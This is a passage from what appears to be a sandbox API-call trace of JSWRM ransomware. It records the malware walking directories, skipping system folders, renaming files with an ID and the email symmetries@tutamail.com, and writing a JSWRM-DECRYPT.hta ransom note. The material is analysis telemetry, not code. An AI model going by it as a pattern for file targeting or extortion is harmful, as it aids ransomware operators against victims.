lpUsedDefaultChar=0x0) returned 13 [0068.180] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="osknumpad.xml", cchWideChar=13, lpMultiByteStr=0x345ebd8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="osknumpad.xml", lpUsedDefaultChar=0x0) returned 13 [0068.180] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0068.180] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241128 [0068.180] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="osknumpad.xml", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0068.180] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="osknumpad.xml", cchWideChar=13, lpMultiByteStr=0x345eba8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="osknumpad.xml", lpUsedDefaultChar=0x0) returned 13 [0068.180] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241128 | out: hHeap=0x1e0000) returned 1 [0068.180] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cca8 [0068.180] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d098 | out: hHeap=0x1e0000) returned 1 [0068.180] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0068.180] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0068.180] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23da70 [0068.180] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknumpad.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\osknumpad.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0068.180] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=10076646113794672) returned 0 [0068.180] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0068.180] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24e1e0 [0068.180] ReadFile (in: hFile=0xffffffff, lpBuffer=0x24e1e0, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1e0, lpNumberOfBytesRead=0x345e89c*=0x0, lpOverlapped=0x0) returned 0 [0068.180] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1e0 | out: hHeap=0x1e0000) returned 1 [0068.180] CloseHandle (hObject=0xffffffff) returned 1 [0068.180] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0068.180] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0068.180] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.181] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8328, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0068.181] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0068.181] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.181] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0068.181] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a300 [0068.181] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a300, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0068.181] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a300 | out: hHeap=0x1e0000) returned 1 [0068.181] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235c80 [0068.181] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e8b8 [0068.181] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235c80 | out: hHeap=0x1e0000) returned 1 [0068.181] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0068.181] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknumpad.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\osknumpad.xml"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknumpad.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\osknumpad.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0068.181] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e8b8 | out: hHeap=0x1e0000) returned 1 [0068.181] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0068.181] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23da70 | out: hHeap=0x1e0000) returned 1 [0068.181] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa06cef41, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a37a4cb, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="oskpred", cAlternateFileName="")) returned 1 [0068.181] lstrcmpiW (lpString1="oskpred", lpString2=".") returned 1 [0068.181] lstrcmpiW (lpString1="oskpred", lpString2="..") returned 1 [0068.181] lstrcmpiW (lpString1="oskpred", lpString2="...") returned 1 [0068.181] lstrcmpiW (lpString1="oskpred", lpString2="windows") returned -1 [0068.181] lstrcmpiW (lpString1="oskpred", lpString2="recovery") returned -1 [0068.181] lstrcmpiW (lpString1="oskpred", lpString2="perflogs") returned -1 [0068.181] lstrcmpiW (lpString1="oskpred", lpString2="documents and settings") returned 1 [0068.181] lstrcmpiW (lpString1="oskpred", lpString2="$RECYCLE.BIN") returned 1 [0068.181] lstrcmpiW (lpString1="oskpred", lpString2="system volume information") returned -1 [0068.181] lstrcmpiW (lpString1="oskpred", lpString2="msocache") returned 1 [0068.181] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0068.181] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cca8 | out: hHeap=0x1e0000) returned 1 [0068.181] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d920 [0068.181] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0068.181] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247b80 [0068.181] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0068.182] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskpred\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskpred\\jswrm-decrypt.hta")) returned 0xffffffff [0068.182] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247b80 | out: hHeap=0x1e0000) returned 1 [0068.182] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0068.182] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b78c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0068.182] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241128 [0068.182] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x24e1e0 [0068.182] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241128 | out: hHeap=0x1e0000) returned 1 [0068.182] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x24ffb0 [0068.182] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1e0 | out: hHeap=0x1e0000) returned 1 [0068.182] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d680 [0068.182] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2476a8 [0068.182] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d680 | out: hHeap=0x1e0000) returned 1 [0068.182] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskpred\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskpred\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x458 [0068.182] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0068.182] WriteFile (in: hFile=0x458, lpBuffer=0x345b8a0*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b86c, lpOverlapped=0x0 | out: lpBuffer=0x345b8a0*, lpNumberOfBytesWritten=0x345b86c*=0x230c, lpOverlapped=0x0) returned 1 [0068.183] CloseHandle (hObject=0x458) returned 1 [0068.183] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2476a8 | out: hHeap=0x1e0000) returned 1 [0068.183] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24ffb0 | out: hHeap=0x1e0000) returned 1 [0068.184] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d920 | out: hHeap=0x1e0000) returned 1 [0068.184] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0068.184] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cea0 [0068.184] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23db18 [0068.184] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cca8 [0068.184] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247d70 [0068.184] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cca8 | out: hHeap=0x1e0000) returned 1 [0068.184] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskpred\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskpred\\jswrm-decrypt.hta")) returned 0x20 [0068.184] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247d70 | out: hHeap=0x1e0000) returned 1 [0068.184] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23db18 | out: hHeap=0x1e0000) returned 1 [0068.185] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23da70 [0068.185] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskpred\\*.*", lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa06cef41, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1f4d71b5, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x231f80 [0068.185] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0068.185] FindNextFileW (in: hFindFile=0x231f80, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa06cef41, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1f4d71b5, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0068.185] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0068.185] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0068.185] FindNextFileW (in: hFindFile=0x231f80, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1f4d71b5, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x1f4d71b5, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x1f4d71b5, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x0, dwReserved1=0x0, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0068.185] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0068.186] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0068.186] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0068.186] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0068.186] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0068.186] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0068.186] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0068.186] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0068.186] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0068.186] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0068.186] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0068.186] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0068.186] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0068.186] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2410d8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0068.186] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0068.186] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.186] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0068.186] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0068.186] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241330, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0068.186] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.186] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x1fc808 [0068.186] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23da70 | out: hHeap=0x1e0000) returned 1 [0068.186] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0068.186] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0068.186] FindNextFileW (in: hFindFile=0x231f80, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e421ed8, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e421ed8, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e421ed8, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x39c, dwReserved0=0x0, dwReserved1=0x0, cFileName="oskpredbase.xml", cAlternateFileName="")) returned 1 [0068.186] lstrcmpiW (lpString1="oskpredbase.xml", lpString2=".") returned 1 [0068.186] lstrcmpiW (lpString1="oskpredbase.xml", lpString2="..") returned 1 [0068.186] lstrcmpiW (lpString1="oskpredbase.xml", lpString2="...") returned 1 [0068.186] lstrcmpiW (lpString1="oskpredbase.xml", lpString2="windows") returned -1 [0068.186] lstrcmpiW (lpString1="oskpredbase.xml", lpString2="recovery") returned -1 [0068.186] lstrcmpiW (lpString1="oskpredbase.xml", lpString2="perflogs") returned -1 [0068.186] lstrcmpiW (lpString1="oskpredbase.xml", lpString2="documents and settings") returned 1 [0068.186] lstrcmpiW (lpString1="oskpredbase.xml", lpString2="$RECYCLE.BIN") returned 1 [0068.186] lstrcmpiW (lpString1="oskpredbase.xml", lpString2="system volume information") returned -1 [0068.186] lstrcmpiW (lpString1="oskpredbase.xml", lpString2="msocache") returned 1 [0068.186] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0068.186] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="oskpredbase.xml", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0068.187] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="oskpredbase.xml", cchWideChar=15, lpMultiByteStr=0x345e870, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oskpredbase.xml", lpUsedDefaultChar=0x0) returned 15 [0068.187] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0068.187] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0068.187] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="oskpredbase.xml", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0068.187] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="oskpredbase.xml", cchWideChar=15, lpMultiByteStr=0x345e840, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oskpredbase.xml", lpUsedDefaultChar=0x0) returned 15 [0068.187] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0068.187] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x21fab8 [0068.187] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0068.187] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0068.187] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0068.187] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x1fc808 [0068.187] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0068.187] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=9564342414460936) returned 0 [0068.187] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0068.187] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24f1e8 [0068.187] ReadFile (in: hFile=0xffffffff, lpBuffer=0x24f1e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24f1e8, lpNumberOfBytesRead=0x345e534*=0x0, lpOverlapped=0x0) returned 0 [0068.187] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24f1e8 | out: hHeap=0x1e0000) returned 1 [0068.187] CloseHandle (hObject=0xffffffff) returned 1 [0068.187] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x1f1c60 [0068.187] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0068.187] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.187] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8328, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0068.187] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0068.187] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.187] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0068.187] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1f8 [0068.187] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1f8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0068.187] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1f8 | out: hHeap=0x1e0000) returned 1 [0068.188] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x23b278 [0068.188] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f848 [0068.188] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b278 | out: hHeap=0x1e0000) returned 1 [0068.188] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0068.188] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0068.188] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f848 | out: hHeap=0x1e0000) returned 1 [0068.188] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f1c60 | out: hHeap=0x1e0000) returned 1 [0068.188] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0068.188] FindNextFileW (in: hFindFile=0x231f80, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e421ed8, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e421ed8, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e421ed8, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x39c, dwReserved0=0x0, dwReserved1=0x0, cFileName="oskpredbase.xml", cAlternateFileName="")) returned 0 [0068.188] FindClose (in: hFindFile=0x231f80 | out: hFindFile=0x231f80) returned 1 [0068.188] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21fab8 | out: hHeap=0x1e0000) returned 1 [0068.188] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cea0 | out: hHeap=0x1e0000) returned 1 [0068.188] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0068.188] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e3d5a11, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e3d5a11, 